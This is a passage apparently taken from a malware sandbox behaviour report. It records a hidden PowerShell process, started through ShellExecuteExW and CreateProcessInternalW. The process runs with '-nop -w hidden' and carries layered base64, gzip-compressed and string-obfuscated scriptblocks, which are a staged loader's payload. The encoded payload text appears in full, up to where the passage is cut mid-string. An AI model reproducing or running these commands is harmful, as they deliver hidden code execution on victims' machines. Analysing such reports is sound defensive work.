UABnAG4AaABJAGMAeQA0AHIAdwBwAHoAQgBaADQAZwBpAGYAWABOADgALwBZAEkAYwBMADMAdwBYAHgAagAzAEsAUABzAG4AdABFAGMANwBWAGQAQwB6AGwATABMAEoAeQBvAG8AWgB2AHUARABaAG0ARAAwAHMARAAnACcAKwAnACcASwA1AHAAbwBTAEwAawB1AC8ALwB5ADQAcAA4ADUAUABhAG8AdAB6ADUAbABpAEEAYQB5ADUASwA1AGkAegBrAE8AeQBpADYAbABrAGkATAA4AFUATgBJAEQAYgAzAGQAcgBMAEUAcwAnACcAKwAnACcARwBjAFMASQBXAE0ANAArAFgASgB5AFIAcwAxAE0AdABXACcAJwArACcAJwBHAEMAJwAnACsAJwAnAE0AUABYADQARwAzAFIAMgB4AGcAdgBtAFIAdQBMAE0ARgBkAGoAcgBlAEoATQBFACsAaQBNAEwAdABVADYAdQBXAGcASQAwAHYAdwBPAEkAcQBZAG8ANwBwAHUAaABPAE4AWQBLAGcAbgB6ADEAUAA5ADgAcwBmAGgATgBuAHUAZQBIADMAeQBRAGgASgB3AEUAdQA2AHkASABIAEUAVgB1AGIATwBIAG8AawBEAG8ANwBMAGYAUgBTADYARgBOADkAZwBiAHcARgBXAEoAbwA5AEkANgBDADgAVQBCAGQAUQBlADIAUQByAEwAWQBwAGgAUQBXAGgATAArAGkAeAB2ADUAQwBtADgASwA2AE4ANQByAEoARAA4ADMAQQBxADAAUgBqADUAUQBTAFoAUAB7ADEAfQBsAE4AUQAzAG0ASgBoAFEAZgBEAEsAVgBYADQAagB5AFEAUQBJAEYAMQBJAEEASwBnADkAeQBNAEYAMABDAHYASQB3AHgAdgBxAEsAOQB3ADUAQwBvAG8AMQB6ADMAWQB3AEIAQwB5AFAAVwBFAHcAeQAyADYAOQBDAHQAUwBRAFkAYwBEAGIAaQBMAE4AcgBCAHEAMwBnAGIASgBWAGgAWgBQAE0ARQB0AGkAUABTADAAOQBGADUAZgB0AGMASQBRAHoARABZAHgAQwBPAFkAMgBJACsANwBpAGEAUAA1AHsAMQB9ADUAawBXAGkATgA3AGEAcAAwAHQAcwA4AGIAbQBPACcAJwArACcAJwBQAGgATABpADkAQwAxAEYAQQBuAEkASwBxADgAbQB2ADUAdwBCADcARgBHAFIAegBsAFEAdQAwAEsANABwAE8AbABmAEEATwA3AGIAVQB5AHgAagAzAGcASwBjAFUAcQBMAEYAMgBhAGQAZwBQAEEAbgBXAHkAMABoADEATQBXAFIANgBrAEIATwBZADQAZwBLADAAcQAzADgASABNAHcAaABhADcASwBrAGgAdwBZAE8AQQBMAHIARABPAC8AQgBVADkASwBCAEEAYwBLAEcAZABGACcAJwArACcAJwA4AFcAdQBPAEQAMQA5AEIAeQBXAHAAUgBWAEUAYwBsADQAUgBSAEEAaABYAHEAbABBAFEAewAxAH0ASQA0AHIAZABrAHEAQwBHAE0AYwBtADMAMQBJAFMAegA3AEYARQA2AGgAbQBzAGsAbABCAE0ASAB4AGIAeAB3AHQAMQBEACsAQgBtAGQAKwBiAEkAdQBGAE0AWQA4AFMAQgA1AEkASwBFAE4AeQBhAGEAKwB3AFEAUgBGAE4ARQBTAGsASwBmAHUARgBqAGIAbQBjAFEAdgBqAHAAZAAnACcAKwAnACcAZQB4AGEATwBGAEsASQBYAEsAQQBVACsAUABrAEEAKwBRAHAARABpAFkAUABLAFYASwBCAEoARQBDAEwAWgBTAHkAaQBiAGsAZQByAEMAawBPAFEAQwBQAHIARgAxADIASwBmAE8AZwBPAGUAWABWAGsAegBFAEkAKwBkAHEAVQAzAHcAaQB5AHEANABFACcAJwArACcAJwBEADUARgBKAGMAQwBrAEcAZABCAFEAcgBKAE4AeQBuAGgASgBzAEUAbgBFAG8AZgB1AGsARwBHAC8AaQAvAHgASABCAHkANQA2AHsAMQB9AGgAZABLAEsAYwBKADQAWQB1AFMAaQB0AHUAYgBiAGoASwBmAG4ARgBBAEsAZgA4AHoATQBIAEoAbwBJAGcANAB3AE4AQwBOAFcASwBDAGgARwBKADgAMgBEACsAMQBGAC8AbABTADUASgBpADAAVgAxAGwAUQBQAHEAZQBGAG8ASwAxAEoAewAxAH0ATgA2AFMAbQBHAC8AQwB6AFMARQBOAG4ANwB7ADEAfQBQADMAYwAnACcAKwAnACcAdgBEAFEAcgAwAHsAMQB9AHQANwBkAEoAewAxAH0AOQBWAGcAMwArAHEAUAAyAHUATgA5AHYAUABnADUATQB1ADgAbgBOAGoAcwA0AHYAUgB6AG8AMwBPAG4AYwBQAEQANgBiAGEAdgA3AEcAbQBmAEsAYQByAC8AVgB0AFMAWABVADIAYgArAC8AVwBBADcATQAyAGgANgBrADYAMwBsAGQATwA5AHQAdAA5AFUAdABlADMAKwB3AFgAZQA5AGEAZAB2AHoALwBEAFAAUAB2AEsAbAA5ADcAcABMAGgAcABEAFgAVwBxAG4AVQAwAGIASABlAFMANAAnACcAKwAnACcAVQB7ADEAfQBiAGEATgBWAG0AMwBDAEcAYgAvAHAAaABZADQAOQBXAGcAeQArACsAbgBOAGsAVwBXAFYALwBIAHYAYQB1AGUASQBiAEkAZgBSAGcAMQAxAGoAeABsADUAWAAxAGQANgB5ADQAZQB3AEgAbgB0ADEAYgBHAHUANQB1ADIAcQArAGMAewAxAH0ANQBvAHIAdABhAE8AcQByAGIAQgBqAGQAegBWADIATwAnACcAKwAnACcAZABVAGkAZABWAFMAeAByAGEANAAyAHQAagByAGEAZQBBAHkAeQBVADcALwBpAE4AVQBGAEcANgAnACcAKwAnACcANgB5AEwAKwB1AHYAZAB4AHUASgBNADkAVgBVAHQAYQBZAFkAQgBXAG0AbwB7ADEAfQB1ADAANQBtADYANwB1AGIASgBmAGoAcQBRAGcAaABHAHAAZAByAFUAWABiAHgAbABYADQAWQB7ADEAfQBZAGoAOQBXAGIATgBTADcANABqAE8AMQBOAFcAagBXADMARAB0ADcAMwA2ACsAagA1AFcAQgBtAEoAOABQAHoAVwBlAHgAMgBCAHUAMgBOAHAAawA1AHIAbgBZAEgAVwA3AHEAbQBkAEcAOAB2AHEAegBpAGIAJwAnACsAJwAnADIAYQBqAGEANQBwAGIATwBKAFYAWgBzAHgANwBHAHcAcQBTAC8AQgBCAHMASABaAHQAcgArADQAcgBSAHMALwBYAGwAOQB1AGEARAAyAGUAZABaAGYANABEAEUAdABEADcAdQBsACcAJwArACcAJwBzADUAdAA3ADUAbwA0AGUAYgBTAEgAegAzADYANwBuAGgAeQBkAHIATwA5ADIAJwAnACsAJwAnAHQAMwBYAG0AVwBwAFYASwB2AFkAbgBTAFAAWABjAEkAaQBGAHYAMQBCAGMAaQBZAG0AawBmAC8AUABoAEIAMwBFAEEAUABmADUAYgB3AHQANQBxADgAZwBhAEoANABpAFMAZwBRAEEAZABwADMAVQBZAHAAZABGAG4AWAB6AGoAagB4AGkASgBMAFcAUQA1AFcAeQBzAHIAMwBBAFUAWQBnAHEAagBFAEkAWgBsAHcAVwBHAFYAVQB1AGEAawA4AHkARAB0ADMAewAxAH0AQwBLAEQAZwBNAGkAbgBWAGUAVwBuAHMAWAAwADIAcABNAGkAUABDAGsAcQB4AHoAbABSAGkAQwA0AHUAWgBoAEEAawBsAEEAVQBFAFAATQBTAGgAegA1AGUAbAA2AHIAWgBSAHIAVQBKAC8AcgAyADYAcgB6AFkAegAvADcANwA5AFkAaQA2ADEAJwAnACsAJwAnADMAcwBwAGcAVwBVAEQAVQB0AE4AOQBnADkAZQBLAGEAWgBaADMAQgBHAFAARQBHAFcAZgB6ADEAUQA4AEEAMwBBAG8AUwBHADkAQwBkAFYAYgBxAE0ASABSAEsAMgBnAGcAMABNADgATwBoAFoAMQBpAHAAegBGAEcAbgB5AE8AWABYACsAdQBKAEIAawBmAGcAQQBMAEUAYQAzAEgAdQBlAEQAbgA5AGcAQgAxAGkAZgA0AEcAKwBDAHkATgBQAFIAKwBIAHoAVQBpAGoASABWADEARgA5AEwAbQBMAHcANwBMAGUASABQAC8AUgBmAEMASABHAFgALwBzAFAAcwB1AEUAbABWAEwAQgAyAHgAZQBpAEgAOABXAFAATwB2AHEAdgB4AEMAQgBDAFMASQBjAE4ARQAzAG8AcwB4AFEAZgBwAHYANgByAFEATwBSAEYAOABpAHkALwBhAFgAYQBnAEMATAB4ADgAcABaAC8AQgAxAHcAawAvAHUAWQBJAFAAcQA2AHoAUgAvAHcAWABqADkAawBmAG8AZgB3AHMAQQBBAEEAewAwAH0AewAwAH0AJwAnACkALQBmACcAJwA9ACcAJwAsACcAJwBUACcAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA
cmdline	"powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAKU1imcCA7VWbW+bSBD+Xqn/AVVIgO{1}4vU'+'k{1}qdKBX3FMYoeAY/us0wYWvPHCu'+'rDEL73+9xswxOklucud1JUsw+zM7Owzz8zgJaHDCQsFx/scCd8/fhDyNUIRCgRZjEfmDpUEcdN{1}jpti5K+Fr4I'+'8V9frNgsQCRcXF60kinDID+/lHuZqHOPgnhIcy4rwpzBZ4gifXN8/YIcL3wXxj3KPsntEc7VdCzlLLJyooZvuDZmD0sD'+'K5poSLku//y4p85Paotz5liAay5K5izkOyi6lkiL8UNIDb3drLEs'+'GcSIWM4+XJyRs1MtW'+'GC'+'MPX4G3R2xgvmRuLMFdjreJME+iMLtU6uWgI0vwOIqYo7puhONYKgnz1P98sfhNnueH3yQhJwEu6yHHEVubOHokDo7LfRS6FN9gbwFWJo9I6C8UBdQe2QrLYphQWhL+ixv5Cm8K6N5rJD83Aq0Rj5QSZP{1}lNQ3mJhQfDKVX4jyQQIF1IAKg9yMF0CvIwxvqK9w5Coo1z3YwBCyPWEwy269CtSQYcDbiLNrBq3gbJVhZPMEtiPS09F5ftcIQzDYxCOY2I+7iaP5{1}5kWiN7ap0ts8bmO'+'PhLi9C1FAnIKq8mv5wB7FGRzlQu0K4pOlfAO7bUyxj3gKcUqLF2adgPAnWy0h1MWR6kBOY4gK0q38HMwha7KkhwYOALrDO/BU9KBAcKGdF'+'8WuOD19ByWpRVEcl4RRAhXqlAQ{1}I4rdkqCGMcm31ISz7FE6hmsklBMHxbxwt1D+Bmd+bIuFMY8SB5IKENyaa+wQRFNESkKfuFjbmcQvjpd'+'exaOFKIXKAU+PkA+QpDiYPKVKBJECLZSyibkerCkOQCPrF12KfOgOeXVkzEI+dqU3wiyq4E'+'D5FJcCkGdBQrJNynhJsEnEofukGG/i/xHBy56{1}hdKKcJ4YuSitubbjKfnFAKf8zMHJoIg4wNCNWKChGJ82D+1F/lS5Ji0V1lQPqeFoK1J{1}N6SmG/CzSENn7{1}P3c'+'vDQr0{1}t7dJ{1}9Vg3+qP2uN9vPg5Mu8nNjs4vRzo3OncPD6bav7GmfKar/VtSXU2b+/WA7M2h6k63ldO9tt9Ute3+wXe9advz/DPPvKl97pLhpDXWqnU0bHeS4'+'U{1}baNVm3CGb/phY49Wgy++nNkWWV/HvaueIbIfRg11jxl5X1d6y4ewHnt1bGu5u2q+c{1}5ortaOqrbBjdzV2O'+'dUidVSxra42tjraeAyyU7/iNUFG6'+'6yL+uvdxuJM9VUtaYYBWmo{1}u05m67ubJfjqQghGpdrUXbxlX4Y{1}Yj9WbNS74jO1NWjW3Dt736+j5WBmJ8PzWex2Bu2Npk5rnYHW7qmdG8vqzib'+'2aja5pbOJVZsx7GwqS/BBsHZtr+4rRs/Xl9uaD2edZf4DEtD7ul'+'s5t75o4ebSHz367nhydrO92'+'t3XmWpVKvYnSPXcIiFv1BciYmkf/PhB3EAPf5bwt5q8gaJ4iSgQAdp3UYpdFnXzjjxiJLWQ5Wysr3AUYgqjEIZlwWGVUuak8yDt3{1}CKDgMinVeWnsX02pMiPCkqxzlRiC4uZhAklAUEPMShz5el6rZRrUJ/r26rzYz/779Yi61'+'3spgWUDUtN9g9eKaZZ3BGPEGWfz1Q8A3AoSG9CdVbqMHRK2gg0M8OhZ1ipzFGnyOXX+uJBkfgALEa3HueDn9gB1if4G+CyNPR+HzUijHV1F9LmLw7LeHP/RfCHGX/sPsuElVLB2xeiH8WPOvqvxCBCSIcNE3osxQfpv6rQORF8iy/aXagCLx8pZ/B1wk/uYIPq6zR/wXj9kfofwsAAA{0}{0}')-f'=','T')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW March 3, 2025, 2:46 p.m.	show_type: 0 filepath_r: powershell.exe parameters: -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEASwBVADEAaQBtAGMAQwBBADcAVgBXAGIAVwArAGIAUwBCAEQAKwBYAHEAbgAvAEEAVgBWAEkAZwBPAHsAMQB9ADQAdgBVACcAJwArACcAJwBrAHsAMQB9AHEAZABLAEIAWAAzAEYATQBZAG8AZQBBAFkALwB1AHMAMAB3AFkAVwB2AFAASABDAHUAJwAnACsAJwAnAHIARABFAEwANwAzACsAOQB4AHMAdwB4AE8AawBsAHUAYwB1AGQAMQBKAFUAcwB3ACsAegBNADcATwB3AHoAegA4AHoAZwBKAGEASABEAEMAUQBzAEYAeAAvAHMAYwBDAGQAOAAvAGYAaABEAHkATgBVAEkAUgBDAGcAUgBaAGoARQBmAG0ARABwAFUARQBjAGQATgB7ADEAfQBqAHAAdABpADUASwArAEYAcgA0AEkAJwAnACsAJwAnADgAVgA5AGYAcgBOAGcAcwBRAEMAUgBjAFgARgA2ADAAawBpAG4ARABJAEQAKwAvAGwASAB1AFoAcQBIAE8AUABnAG4AaABJAGMAeQA0AHIAdwBwAHoAQgBaADQAZwBpAGYAWABOADgALwBZAEkAYwBMADMAdwBYAHgAagAzAEsAUABzAG4AdABFAGMANwBWAGQAQwB6AGwATABMAEoAeQBvAG8AWgB2AHUARABaAG0ARAAwAHMARAAnACcAKwAnACcASwA1AHAAbwBTAEwAawB1AC8ALwB5ADQAcAA4ADUAUABhAG8AdAB6ADUAbABpAEEAYQB5ADUASwA1AGkAegBrAE8AeQBpADYAbABrAGkATAA4AFUATgBJAEQAYgAzAGQAcgBMAEUAcwAnACcAKwAnACcARwBjAFMASQBXAE0ANAArAFgASgB5AFIAcwAxAE0AdABXACcAJwArACcAJwBHAEMAJwAnACsAJwAnAE0AUABYADQARwAzAFIAMgB4AGcAdgBtAFIAdQBMAE0ARgBkAGoAcgBlAEoATQBFACsAaQBNAEwAdABVADYAdQBXAGcASQAwAHYAdwBPAEkAcQBZAG8ANwBwAHUAaABPAE4AWQBLAGcAbgB6ADEAUAA5ADgAcwBmAGgATgBuAHUAZQBIADMAeQBRAGgASgB3AEUAdQA2AHkASABIAEUAVgB1AGIATwBIAG8AawBEAG8ANwBMAGYAUgBTADYARgBOADkAZwBiAHcARgBXAEoAbwA5AEkANgBDADgAVQBCAGQAUQBlADIAUQByAEwAWQBwAGgAUQBXAGgATAArAGkAeAB2ADUAQwBtADgASwA2AE4ANQByAEoARAA4ADMAQQBxADAAUgBqADUAUQBTAFoAUAB7ADEAfQBsAE4AUQAzAG0ASgBoAFEAZgBEAEsAVgBYADQAagB5AFEAUQBJAEYAMQBJAEEASwBnADkAeQBNAEYAMABDAHYASQB3AHgAdgBxAEsAOQB3ADUAQwBvAG8AMQB6ADMAWQB3AEIAQwB5AFAAVwBFAHcAeQAyADYAOQBDAHQAUwBRAFkAYwBEAGIAaQBMAE4AcgBCAHEAMwBnAGIASgBWAGgAWgBQAE0ARQB0AGkAUABTADAAOQBGADUAZgB0AGMASQBRAHoARABZAHgAQwBPAFkAMgBJACsANwBpAGEAUAA1AHsAMQB9ADUAawBXAGkATgA3AGEAcAAwAHQAcwA4AGIAbQBPACcAJwArACcAJwBQAGgATABpADkAQwAxAEYAQQBuAEkASwBxADgAbQB2ADUAdwBCADcARgBHAFIAegBsAFEAdQAwAEsANABwAE8AbABmAEEATwA3AGIAVQB5AHgAagAzAGcASwBjAFUAcQBMAEYAMgBhAGQAZwBQAEEAbgBXAHkAMABoADEATQBXAFIANgBrAEIATwBZADQAZwBLADAAcQAzADgASABNAHcAaABhADcASwBrAGgAdwBZAE8AQQBMAHIARABPAC8AQgBVADkASwBCAEEAYwBLAEcAZABGACcAJwArACcAJwA4AFcAdQBPAEQAMQA5AEIAeQBXAHAAUgBWAEUAYwBsADQAUgBSAEEAaABYAHEAbABBAFEAewAxAH0ASQA0AHIAZABrAHEAQwBHAE0AYwBtADMAMQBJAFMAegA3AEYARQA2AGgAbQBzAGsAbABCAE0ASAB4AGIAeAB3AHQAMQBEACsAQgBtAGQAKwBiAEkAdQBGAE0AWQA4AFMAQgA1AEkASwBFAE4AeQBhAGEAKwB3AFEAUgBGAE4ARQBTAGsASwBmAHUARgBqAGIAbQBjAFEAdgBqAHAAZAAnACcAKwAnACcAZQB4AGEATwBGAEsASQBYAEsAQQBVACsAUABrAEEAKwBRAHAARABpAFkAUABLAFYASwBCAEoARQBDAEwAWgBTAHkAaQBiAGsAZQByAEMAawBPAFEAQwBQAHIARgAxADIASwBmAE8AZwBPAGUAWABWAGsAegBFAEkAKwBkAHEAVQAzAHcAaQB5AHEANABFACcAJwArACcAJwBEADUARgBKAGMAQwBrAEcAZABCAFEAcgBKAE4AeQBuAGgASgBzAEUAbgBFAG8AZgB1AGsARwBHAC8AaQAvAHgASABCAHkANQA2AHsAMQB9AGgAZABLAEsAYwBKADQAWQB1AFMAaQB0AHUAYgBiAGoASwBmAG4ARgBBAEsAZgA4AHoATQBIAEoAbwBJAGcANAB3AE4AQwBOAFcASwBDAGgARwBKADgAMgBEACsAMQBGAC8AbABTADUASgBpADAAVgAxAGwAUQBQAHEAZQBGAG8ASwAxAEoAewAxAH0ATgA2AFMAbQBHAC8AQwB6AFMARQBOAG4ANwB7ADEAfQBQADMAYwAnACcAKwAnACcAdgBEAFEAcgAwAHsAMQB9AHQANwBkAEoAewAxAH0AOQBWAGcAMwArAHEAUAAyAHUATgA5AHYAUABnADUATQB1ADgAbgBOAGoAcwA0AHYAUgB6AG8AMwBPAG4AYwBQAEQANgBiAGEAdgA3AEcAbQBmAEsAYQByAC8AVgB0AFMAWABVADIAYgArAC8AVwBBADcATQAyAGgANgBrADYAMwBsAGQATwA5AHQAdAA5AFUAdABlADMAKwB3AFgAZQA5AGEAZAB2AHoALwBEAFAAUAB2AEsAbAA5ADcAcABMAGgAcABEAFgAVwBxAG4AVQAwAGIASABlAFMANAAnACcAKwAnACcAVQB7ADEAfQBiAGEATgBWAG0AMwBDAEcAYgAvAHAAaABZADQAOQBXAGcAeQArACsAbgBOAGsAVwBXAFYALwBIAHYAYQB1AGUASQBiAEkAZgBSAGcAMQAxAGoAeABsADUAWAAxAGQANgB5ADQAZQB3AEgAbgB0ADEAYgBHAHUANQB1ADIAcQArAGMAewAxAH0ANQBvAHIAdABhAE8AcQByAGIAQgBqAGQAegBWADIATwAnACcAKwAnACcAZABVAGkAZABWAFMAeAByAGEANAAyAHQAagByAGEAZQBBAHkAeQBVADcALwBpAE4AVQBGAEcANgAnACcAKwAnACcANgB5AEwAKwB1AHYAZAB4AHUASgBNADkAVgBVAHQAYQBZAFkAQgBXAG0AbwB7ADEAfQB1ADAANQBtADYANwB1AGIASgBmAGoAcQBRAGcAaABHAHAAZAByAFUAWABiAHgAbABYADQAWQB7ADEAfQBZAGoAOQBXAGIATgBTADcANABqAE8AMQBOAFcAagBXADMARAB0ADcAMwA2ACsAagA1AFcAQgBtAEoAOABQAHoAVwBlAHgAMgBCAHUAMgBOAHAAawA1AHIAbgBZAEgAVwA3AHEAbQBkAEcAOAB2AHEAegBpAGIAJwAnACsAJwAnADIAYQBqAGEANQBwAGIATwBKAFYAWgBzAHgANwBHAHcAcQBTAC8AQgBCAHMASABaAHQAcgArADQAcgBSAHMALwBYAGwAOQB1AGEARAAyAGUAZABaAGYANABEAEUAdABEADcAdQBsACcAJwArACcAJwBzADUAdAA3ADUAbwA0AGUAYgBTAEgAegAzADYANwBuAGgAeQBkAHIATwA5ADIAJwAnACsAJwAnAHQAMwBYAG0AVwBwAFYASwB2AFkAbgBTAFAAWABjAEkAaQBGAHYAMQBCAGMAaQBZAG0AawBmAC8AUABoAEIAMwBFAEEAUABmADUAYgB3AHQANQBxADgAZwBhAEoANABpAFMAZwBRAEEAZABwADMAVQBZAHAAZABGAG4AWAB6AGoAagB4AGkASgBMAFcAUQA1AFcAeQBzAHIAMwBBAFUAWQBnAHEAagBFAEkAWgBsAHcAVwBHAFYAVQB1AGEAawA4AHkARAB0ADMAewAxAH0AQwBLAEQAZwBNAGkAbgBWAGUAVwBuAHMAWAAwADIAcABNAGkAUABDAGsAcQB4AHoAbABSAGkAQwA0AHUAWgBoAEEAawBsAEEAVQBFAFAATQBTAGgAegA1AGUAbAA2AHIAWgBSAHIAVQBKAC8AcgAyADYAcgB6AFkAegAvADcANwA5AFkAaQA2ADEAJwAnACsAJwAnADMAcwBwAGcAVwBVAEQAVQB0AE4AOQBnADkAZQBLAGEAWgBaADMAQgBHAFAARQBHAFcAZgB6ADEAUQA4AEEAMwBBAG8AUwBHADkAQwBkAFYAYgBxAE0ASABSAEsAMgBnAGcAMABNADgATwBoAFoAMQBpAHAAegBGAEcAbgB5AE8AWABYACsAdQBKAEIAawBmAGcAQQBMAEUAYQAzAEgAdQBlAEQAbgA5AGcAQgAxAGkAZgA0AEcAKwBDAHkATgBQAFIAKwBIAHoAVQBpAGoASABWADEARgA5AEwAbQBMAHcANwBMAGUASABQAC8AUgBmAEMASABHAFgALwBzAFAAcwB1AEUAbABWAEwAQgAyAHgAZQBpAEgAOABXAFAATwB2AHEAdgB4AEMAQgBDAFMASQBjAE4ARQAzAG8AcwB4AFEAZgBwAHYANgByAFEATwBSAEYAOABpAHkALwBhAFgAYQBnAEMATAB4ADgAcABaAC8AQgAxAHcAawAvAHUAWQBJAFAAcQA2AHoAUgAvAHcAWABqADkAawBmAG8AZgB3AHMAQQBBAEEAewAwAH0AewAwAH0AJwAnACkALQBmACcAJwA9ACcAJwAsACcAJwBUACcAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA filepath: powershell.exe	1	1	0
CreateProcessInternalW March 3, 2025, 2:46 p.m.	thread_identifier: 2312 thread_handle: 0x00000454 process_identifier: 2308 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAKU1imcCA7VWbW+bSBD+Xqn/AVVIgO{1}4vU'+'k{1}qdKBX3FMYoeAY/us0wYWvPHCu'+'rDEL73+9xswxOklucud1JUsw+zM7Owzz8zgJaHDCQsFx/scCd8/fhDyNUIRCgRZjEfmDpUEcdN{1}jpti5K+Fr4I'+'8V9frNgsQCRcXF60kinDID+/lHuZqHOPgnhIcy4rwpzBZ4gifXN8/YIcL3wXxj3KPsntEc7VdCzlLLJyooZvuDZmD0sD'+'K5poSLku//y4p85Paotz5liAay5K5izkOyi6lkiL8UNIDb3drLEs'+'GcSIWM4+XJyRs1MtW'+'GC'+'MPX4G3R2xgvmRuLMFdjreJME+iMLtU6uWgI0vwOIqYo7puhONYKgnz1P98sfhNnueH3yQhJwEu6yHHEVubOHokDo7LfRS6FN9gbwFWJo9I6C8UBdQe2QrLYphQWhL+ixv5Cm8K6N5rJD83Aq0Rj5QSZP{1}lNQ3mJhQfDKVX4jyQQIF1IAKg9yMF0CvIwxvqK9w5Coo1z3YwBCyPWEwy269CtSQYcDbiLNrBq3gbJVhZPMEtiPS09F5ftcIQzDYxCOY2I+7iaP5{1}5kWiN7ap0ts8bmO'+'PhLi9C1FAnIKq8mv5wB7FGRzlQu0K4pOlfAO7bUyxj3gKcUqLF2adgPAnWy0h1MWR6kBOY4gK0q38HMwha7KkhwYOALrDO/BU9KBAcKGdF'+'8WuOD19ByWpRVEcl4RRAhXqlAQ{1}I4rdkqCGMcm31ISz7FE6hmsklBMHxbxwt1D+Bmd+bIuFMY8SB5IKENyaa+wQRFNESkKfuFjbmcQvjpd'+'exaOFKIXKAU+PkA+QpDiYPKVKBJECLZSyibkerCkOQCPrF12KfOgOeXVkzEI+dqU3wiyq4E'+'D5FJcCkGdBQrJNynhJsEnEofukGG/i/xHBy56{1}hdKKcJ4YuSitubbjKfnFAKf8zMHJoIg4wNCNWKChGJ82D+1F/lS5Ji0V1lQPqeFoK1J{1}N6SmG/CzSENn7{1}P3c'+'vDQr0{1}t7dJ{1}9Vg3+qP2uN9vPg5Mu8nNjs4vRzo3OncPD6bav7GmfKar/VtSXU2b+/WA7M2h6k63ldO9tt9Ute3+wXe9advz/DPPvKl97pLhpDXWqnU0bHeS4'+'U{1}baNVm3CGb/phY49Wgy++nNkWWV/HvaueIbIfRg11jxl5X1d6y4ewHnt1bGu5u2q+c{1}5ortaOqrbBjdzV2O'+'dUidVSxra42tjraeAyyU7/iNUFG6'+'6yL+uvdxuJM9VUtaYYBWmo{1}u05m67ubJfjqQghGpdrUXbxlX4Y{1}Yj9WbNS74jO1NWjW3Dt736+j5WBmJ8PzWex2Bu2Npk5rnYHW7qmdG8vqzib'+'2aja5pbOJVZsx7GwqS/BBsHZtr+4rRs/Xl9uaD2edZf4DEtD7ul'+'s5t75o4ebSHz367nhydrO92'+'t3XmWpVKvYnSPXcIiFv1BciYmkf/PhB3EAPf5bwt5q8gaJ4iSgQAdp3UYpdFnXzjjxiJLWQ5Wysr3AUYgqjEIZlwWGVUuak8yDt3{1}CKDgMinVeWnsX02pMiPCkqxzlR